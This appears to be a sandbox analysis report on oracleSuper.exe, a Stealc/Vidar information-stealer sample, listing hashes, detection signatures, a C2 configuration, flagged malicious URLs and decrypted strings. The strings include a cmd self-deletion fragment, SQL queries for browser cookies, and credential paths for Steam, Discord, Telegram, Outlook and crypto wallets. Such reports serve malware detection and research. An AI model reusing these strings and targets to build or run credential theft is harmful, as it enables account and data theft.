Windows Analysis Report
oracleSuper.exe

Overview

General Information

Sample name: oracleSuper.exe
Analysis ID: 1601379
MD5: cd7754cff6dfeea0b5d8bb51abe32d7d
SHA1: dc88b17814ef892d1410b261b52e96684a7dd1b2
SHA256: 4c8b1c9ed7ba0d921b0971a3e5de96bfdb3b18024e8880c7aaa2759f13c01316
Tags: cuochiperungiorno-itexeuser-JAMESWT_MHT
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: http://tea.arpdabl.org/. Avira URL Cloud: Label: malware
Source: http://tea.arpdabl.org/: Avira URL Cloud: Label: malware
Source: http://tea.arpdabl.org/Yo Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\fru Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199735694209"], "Botnet": "3ab0abf23bc38232529d79e3b78a588b"}
Source: C:\Users\user\AppData\Local\Temp\fru ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\msidcrl40.dll ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\localTask_v2\msidcrl40.dll ReversingLabs: Detection: 37%
Source: oracleSuper.exe Virustotal: Detection: 8% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\fru Joe Sandbox ML: detected
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %hu/%hu/%hu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %hu/%hu/%hu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DISPLAY
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DISPLAY
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: JohnDoe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: JohnDoe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HAL9TH
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HAL9TH
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VMwareVMware
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VMwareVMware
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NtQueryInformationProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NtQueryInformationProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sscanf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sscanf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptStringToBinaryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptStringToBinaryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ReleaseDC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ReleaseDC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDeviceCaps
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDeviceCaps
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateDCA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateDCA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ntdll.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ntdll.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: crypt32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: crypt32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: user32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: user32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: gdi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: gdi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: advapi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: advapi32.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SystemTimeToFileTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SystemTimeToFileTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemTime
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ExitProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ExitProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrlenA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrlenA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetCurrentProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetCurrentProcess
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcessHeap
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcessHeap
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcpyA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcpyA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetComputerNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetComputerNameA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HeapAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HeapAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAlloc
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemInfo
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetSystemInfo
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualFree
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualFree
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAllocExNuma
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: VirtualAllocExNuma
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserDefaultLangID
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetUserDefaultLangID
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sleep
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sleep
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CloseHandle
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CloseHandle
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CreateEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: OpenEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: OpenEventA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcatA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: lstrcatA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: LoadLibraryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: LoadLibraryA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcAddress
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetProcAddress
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: screenshot.jpg
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: screenshot.jpg
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: message
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: message
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file_name
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: file_name
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: build
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: build
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: hwid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: hwid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HTTP/1.1
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HTTP/1.1
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: POST
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: POST
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: https
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: https
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Discord\tokens.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Discord\tokens.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Soft
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Soft
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: done
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: done
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: browsers
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: browsers
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Steam\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Steam\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: loginusers.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: loginusers.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: libraryfolders.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: libraryfolders.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfig.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DialogConfig.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: config.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: config.vdf
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ssfn*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ssfn*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \config\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \config\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SteamPath
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SteamPath
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Valve\Steam
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Valve\Steam
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: token:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: accounts.xml
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: accounts.xml
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \.purple\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \.purple\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Pidgin
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Pidgin
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000004
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000004
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000003
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000003
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000002
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000002
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000001
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: 00000001
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Password
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Password
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Tox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Telegram
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Telegram
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: F8806DD0C461824F*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: F8806DD0C461824F*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: map*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: map*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: key_datas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: key_datas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Telegram Desktop\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Telegram Desktop\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \discord\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \discord\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Files
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Files
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.lnk
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: *.lnk
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %RECENT%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %RECENT%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %PROGRAMFILES%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DOCUMENTS%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DOCUMENTS%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %USERPROFILE%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %USERPROFILE%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %APPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %APPDATA%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DESKTOP%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %DESKTOP%
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c start
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: /c start
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: open
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: open
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: runas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: runas
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: .exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: .exe
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Temp\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: \Temp\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: vcruntime140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: vcruntime140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: softokn3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: softokn3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: nss3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: nss3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: msvcp140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: msvcp140.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: mozglue.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: mozglue.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: freebl3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: freebl3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: DisplayName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProcessorNameString
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProcessorNameString
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x64
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x64
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x32
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x32
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProductName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProductName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %08lX%04lX%lu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %08lX%04lX%lu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Wallets
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Wallets
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: firefox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: firefox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: opera
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: opera
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: profiles.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: profiles.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local State
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local State
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome-extension_
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome-extension_
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera GX Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera GX Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: IndexedDB
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: IndexedDB
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sync Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sync Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Plugins
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Plugins
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: places.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: places.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: formhistory.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: formhistory.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: cookies.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: cookies.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: guid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: guid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encryptedPassword
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encryptedPassword
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encryptedUsername
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encryptedUsername
